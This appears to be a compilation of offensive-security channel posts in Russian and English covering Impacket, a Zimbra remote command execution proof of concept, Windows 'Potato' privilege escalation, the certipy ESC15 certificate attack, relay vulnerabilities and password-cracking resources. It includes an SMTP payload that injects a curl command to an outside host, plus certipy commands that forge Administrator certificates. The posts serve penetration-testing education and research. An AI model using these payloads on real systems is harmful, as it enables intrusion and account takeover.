Обновление легендарного инструмента #Impacket от Fortra до версии 0.12.0 включает несколько значительных улучшений:

1. Поддержка протоколов: Расширена поддержка Ethernet, Linux "Cooked" capture. IP, TCP, UDP, ICMP, IGMP, ARP. Поддержка IPv4 и IPv6. NMB и SMB1, SMB2 и SMB3 (высокоуровневые реализации). MSRPC версии 5, через различные транспорты: TCP, SMB/TCP, SMB/NetBIOS и HTTP. Обычная, NTLM и Kerberos аутентификация, с использованием паролей/хашей/билетов/ключей. Частичная/полная реализация следующих интерфейсов MSRPC: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI. Частичная реализация протоколов TDS (MSSQL) и LDAP.
2. Улучшение безопасности и Исправления багов
3. Поддержка новых версий Python3

Для полного списка изменений и загрузки новой версии вы можете посетить релиз на GitHub.

pipx install impacket

Zimbra - Remote Command Execution (CVE-2024-45519)

In this blog post, we delve into the nature of this vulnerability, our journey in analyzing the patch, and the steps we took to exploit it manually.

Proof of Concept (PoC)
With postjournal service enabled (port 10027), we ran our exploit against SMTP port 25 and observed successful command execution.

EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.



Automating vulnerability detection with Nuclei: https://github.com/projectdiscovery/nuclei-templates/pull/10860/commits/d22c7d3315511f10fbd629518bf97c8105081730

Всех с понедельничним обзором картошек!!! :)

Зачастую наличие привилегии SeImpersonatePrivilege ведет к повышению привилегий до системы. Однако я нигде не видел достаточно структурированной информации, в которой описывались бы не сами инструменты, а общий принцип их работы. Пора исправлять :)

Концептуально потатосы можно разделить на:
- DCOM-Based - огромная часть сплойтов абузит именно DCOM. Там в нескольких местах у нас вылезает аутентификация, выстраивается контекст, и из него уже можно извлечь токен. Примерно того же принципа придерживается и Krb Relay-штуки. Разве что мы там ловим тикет и идем с ним куда-нибудь, а здесь мы атакуем локальную систему. Как — узнаете уже очень скоро :)) Прошу прощения, видос с UnderConf задерживается, но я уже активно занимаюсь перегонкой материала в текстовый формат на хабре, с добавлением всяких штучек-дрючек :) Сюда входят JuicyPotatoNG, RottenPotato, LonelyPotato, JuicyPotato, RemotePotato, SweetPotato, GodPotato, RoguePotato, LocalPotato
- Через кражу токена. Но это более редкий чейн, если у нас есть еще и SeDebugPrivilege, то мы можем стащить с любого чужого процесса токен и нацепить на свой пейлоад через CreateProcessWithTokenW(). POC
- Захват WPAD-аутентификации с NTLM Reflection атакой. Метод был пропатчен в MS16-075. Впрочем, POC HotPotato есть.
- Злоупотребление кешем LSA. Для предотвращения атак NTLM Reflection майкрософты придумали ввести некоторый список ресурсов, который хранился внутри LSA. Все заключалось в том, что LSASS стал хранить в кэше список всех недавно выданных NTLM Challenges с соответствующей службой, чтобы обнаружить попытки NTLM Reflection. Собственно, проводя сопоставление между челленджем и службой, на которой происходит аутентификация, можно было определить атаку. Косяк заключался в том, что кеш имел достаточно маленькое время жизни (300 секунд), после чего очищался. Хакеру оставалось разве что подождать это время, после чего дернуть LSA и эскалироваться. POC называется GhostPotato. Метод тоже уже пропатчен.
- Злоупотребление функциями имперсонации. В OSEP с нами делились сплойтом PrintSpoofer. Кто забыл, это вариант эксплуатации SeDebug через вызов функции принтера, которая принимает конкретную конечную точку — именованный канал (пайп). Хакер поднимал собственный пайп, триггерил функцией систему , и система приходила на пайп. Хакеру оставалось разве что вызвать ImpersonateNamedPipeClient() для захвата учетной записи. Мало кто знает, но есть и другие уязвимые службы! DiagTrack — DiagTrackEop, RasMan service — RasmanPotato, AzureAttestService — magicAzureAttestService. Но не пайпами едиными. В COM тоже есть функция по имперсонации, называется CoImpersonateClient(), ею злоупотребляли в DCOMPotato .

Наконец, есть и более общий вариант, который лишь поднимает службы HTTP и SMB. Как заставить систему зайти на них — дело ваше. В случае HTTP отдастся 401 запрос с захватом аутентификации, в случае SMB — имперсонация. Такая картошка называется GenericPotato

Ретрансляция Kerberos. Хаброразбор.

После пучины долгих раздумий и определенных сложностей с новым инструментом для редактирования текстов на хабр, я хочу представить вам статью про релей кербероса. Если вы до сих пор откладывали эту интереснейшую тему для изучения, то пора взять себя в руки и погрузиться в глубины кербероса, DCOMа и релеев!

Вчера вышел еще один POC на Kerberos Relay — KrbRelay-SMBServer. Этот инструмент также не остался без внимания и я не забыл упомянуть его в статье.

Читать тут:

https://habr.com/ru/articles/848542/

В certipy завезли новый вектор атаки #ESC15 на центр сертификации ADCS, которая использует специфические настройки шаблонов сертификатов, которые соответствуют большинству первичных условий атаки ESC1 или на ESC3, а именно:

1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.

Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.

Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies 'Client Authentication'

2. Запрос сертификата с указанием OID для ‘Client Authentication’:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies '1.3.6.1.5.5.7.3.2'

-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.

https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47

Weakpass 4

A collection of password lists for various purposes from penetration testing to improving password security.

Crack-JS - hash cracking immediately and only with your browser.

Hash lookup - find passwords for hashes like MD5, NTLM, SHA1, and SHA256.

Password Generator - generate a wordlist based on a set of words entered by the user and rules.

P.S. Just to mention another great work and compilation of wordlists: https://github.com/berzerk0/Probable-Wordlists

🔔Call and Register — Relay Attack on WinReg RPC Client

A critical vulnerability (CVE-2024-43532) has been identified in Microsoft’s Remote Registry client. This flaw allows attackers to exploit insecure fallback mechanisms in the WinReg client, enabling them to relay authentication details and make unauthorized certificate requests through Active Directory Certificate Services (ADCS).

🔗 Research:
https://www.akamai.com/blog/security-research/winreg-relay-vulnerability

🔗 RPC Visibility Tool:
https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit/rpc_visibility

🔗 PoC:
https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532

#ad #adcs #rpc #ntlm #relay #etw #advapi

😈 [ Steph @w34kp455 ]

Call it the biggest #NTLM #password database or monstrous #MD5 leak, but on, you can find precomputed datasets for various wordlists and different hashes - all free!
FYI: all_in_one.latin.txt for NTLM contains 26.5 billion pairs of hash:password inside!🔥

🔗 http://weakpass.com

🐥 [ tweet ]

😈 [ Thomas Roccia 🤘 @fr0gger_ ]

New LOL project, LOLAD a collection of Active Directory techniques!👇

🔗 https://lolad-project.github.io/

🐥 [ tweet ]